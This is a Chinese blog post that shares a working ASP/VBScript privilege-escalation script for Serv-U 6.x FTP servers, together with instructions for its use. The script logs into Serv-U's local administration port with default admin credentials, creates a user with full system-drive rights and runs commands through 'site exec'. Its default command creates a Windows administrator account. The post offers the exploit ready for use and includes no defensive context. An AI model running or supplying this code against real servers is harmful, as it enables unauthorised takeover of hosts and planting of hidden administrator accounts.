夜火博客

Serv-U 6.X 提权脚本

2008-02-12
安全工具
提权
工具共享
脚本Script
5分钟
845字

Author:落叶纷飞 来源:http://www.cnsst.org/ 使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。

1
<%@ LANGUAGE = VBScript %>
2
<%
3
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
4
dim action
5
action=request("action")
6
if  not isnumeric(action) then response.end
7
user = trim(request("u"))
8
pass = trim(request("p"))
9
port = trim(request("port"))
10
cmd = trim(request("c"))
11
f=trim(request("f"))
12
if f="" then
13
f=gpath()
14
else
15
   f=left(f,2)
112 collapsed lines
16
end if
17
ftpport = ffport
18
timeout=3
19


20
loginuser = "User " & user & vbCrLf
21
loginpass = "Pass " & pass & vbCrLf
22
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf
23
mt = "SITE MAINTENANCE" & vbCrLf
24
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
25
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _
26
        "-HomeDir=c:\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
27
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
28
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
29
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
30
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
31
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\|RWAMELCDP" & vbCrLf
32
quit = "QUIT" & vbCrLf
33
newuser=replace(newuser,"c:",f)
34
select case action
35
case 1
36
    set a=Server.CreateObject("Microsoft.XMLHTTP")
37
    a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""
38
    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
39
    set session("a")=a
40
%>
41
<form method="post" name="leaves">
42
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
43
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
44
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
45
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
46
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
47
<input name="action" type="hidden" id="action" value="2"></form>
48
<script language="javascript">
49
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>...<center>');
50
setTimeout("document.all.leaves.submit();",4000);
51
</script>
52
<%
53
case 2
54
    set b=Server.CreateObject("Microsoft.XMLHTTP")
55
    b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""
56
    b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit
57
   set session("b")=b
58
%>
59
<form method="post" name="leaves">
60
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
61
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
62
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
63
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
64
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
65
<input name="action" type="hidden" id="action" value="3"></form>
66
<script language="javascript">
67
document.write('<center>正在提升权限,请等待...,<center>');
68
setTimeout("document.all.leaves.submit();",4000);
69
</script>
70
<%
71
case 3
72
    set c=Server.CreateObject("Microsoft.XMLHTTP")
73
    c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""
74
    c.send loginuser & loginpass & mt & deldomain & quit
75
    set session("c")=c
76
%>
77
<center>提权完毕,已执行了命令:
78
<font color=red><%=cmd%></font>
79
<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
80
</center>
81
<%
82
case else
83
on error resume next
84
    set a=session("a")
85
    set b=session("b")
86
    set c=session("c")
87
    a.abort
88
    Set a = Nothing
89
    b.abort
90
    Set b = Nothing
91
    c.abort
92
    Set c = Nothing
93
%>
94
<center><form method="post" name="leaves">
95
  <tr align="center" valign="middle">
96
    <td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>
97
  </tr>
98
  <tr align="center" valign="middle">
99
    <td width="200">用户名:</td>
100
<td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
101
  </tr>
102
  <tr align="center" valign="middle">
103
    <td>口 令:</td>
104
    <td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>
105
  </tr>
106
  <tr align="center" valign="middle">
107
    <td>端 口:</td>
108
    <td><input name="port" type="text" id="port" value="43958"></td>
109
服务器端口:
110
    <td><input name="ffport" type="text" id="ffport" value="65500"></td>
111
服务器IP:
112
    <td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>
113
  </tr>
114
  <tr align="center" valign="middle">
115
    <td>系统路径:</td>
116
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
117
  </tr>
118
  <tr align="center" valign="middle">
119
    <td>命 令:</td>
120
    <td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add" size="50"></td>
121
  </tr>
122
  <tr align="center" valign="middle">
123
    <td colspan="2"><input type="submit" name="Submit" value="提交">
124
      <input type="reset" name="Submit2" value="重置">
125
      <input name="action" type="hidden" id="action" value="1"></td>
126
  </tr>
127
</form></center>

使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。

1
<% end select
2
function Gpath()
3
on error resume next
4
    err.clear
5
    set f=Server.CreateObject("Scripting.FileSystemObject")
6
    if err.number>0 then
7
gpath="c:"
8
        exit function
9
    end if
10
gpath=f.GetSpecialFolder(0)
11
gpath=lcase(left(gpath,2))
12
set f=nothing
13
end function
14
Function GName()
15
If request.servervariables("SERVER_PORT")="80" Then
7 collapsed lines
16
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
17
Else
18
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
19
End If
20
End Function
21
%>
22
``
AVG Anti-Virus 8.0 Build 62a1257
卡巴斯基Kaspersky KAV/KIS 7.0.1.323 key
本文标题:Serv-U 6.X 提权脚本
文章作者:夜火
发布时间:2008-02-12
Copyright 2007-2025
  夜火博客
站点地图
夜火笔记
CloudFlare Batch 批量解析域名